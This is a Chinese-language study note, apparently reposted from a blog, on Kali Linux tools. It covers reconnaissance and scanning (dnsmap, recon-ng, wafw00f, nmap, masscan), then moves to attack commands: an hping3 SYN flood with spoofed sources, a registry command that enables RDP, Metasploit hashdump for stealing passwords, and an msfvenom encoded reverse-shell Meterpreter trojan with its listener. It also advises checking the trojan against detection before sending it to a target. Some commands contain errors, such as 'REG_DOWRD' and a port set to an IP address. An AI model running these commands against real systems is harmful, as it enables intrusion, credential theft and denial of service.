KALI中常规工具解析笔记

bettercap  ARP欺骗

DNS侦查

dnsmap  暴力猜解子域名

dmitry -wiens -o  search.txt  baidu.com         综合dns、域名信息、子域名 收集集合工具平台

recon-ng 暴力dns破解子域名  这个功能也不错  与shodan接口结合最好  

IPS/IDS识别(入侵检测系统)

fragroute  www.baidu.com   然后打开浏览器  就会去记录了

lbd   baidu.com    检测网站负载均衡情况  只能检测nginx       现在基本被淘汰了

wafw00f    www.baidu.com   waf检测   好像也不太好用

枚举主机

atk6-alive6   etho(网卡)  只能扫描同局域网内IPV6地址主机

msf框架也有这功能

set rhosts  ipv6地址

use auxiliary/scanner/discovery/ipv6_multicast_ping

show options

run

老师推荐好用的工具:hping3

hping3 --icmp -c 2 192.168.1.7  常规检测内网存活

hping3 -S --flood --rand-source -p 80 192.168.1.7  泛洪攻击

hping3  -1 ip

nmap 192.168.1.0/24  测试同一网段存活率

端口、服务器、服务的扫描(nmap)

指纹识别

系统识别

nmap -O 192.168.0.1

xprobe2  www.freebuf.com  -p tcp:80:open

whatweb   www.freebuf.com

masscan  大规模扫描  随机分配主机和速度  这个比较好

masscan 192.168.1.0/24 -p 80 --banners

综合工具:sparta 斯巴达  界面化工具   添加ip(段)即可   挺不错的

漏洞扫描和利用框架  openvas 

web应用攻击和审计框架

W3AF   安装不是很友好  运行有点卡顿  暂时没有太多使用

msf   一套流程

后渗透重要命令: 通过注册表添加一条注册表信息开启3389端口 :REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DOWRD /d 00000000 /f

读取密码:search hashdump  use一个利用模块 show options  set sessions  run  获取密码

远程桌面连接:rdesktop  192.168.0.1:3389

生成木马:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=自己ip LPORT=4444  -f exe > /root/xiee.exe

发给目标主机前  可以先去网上检测一下 

然后在攻击机器上开启监听模块:msf5 > use exploit/multi/handler

设置payload:  set payload windows/meterpreter/reverse_tcp  跟生成木马用的差不多的
设置自己的监听端口: set lport 192.168.188.255
开启:run

Armitage

 界面化的msf  有时可能会有点卡顿和迟缓

猜你喜欢

转载自www.cnblogs.com/Qiuzhiyu/p/12562425.html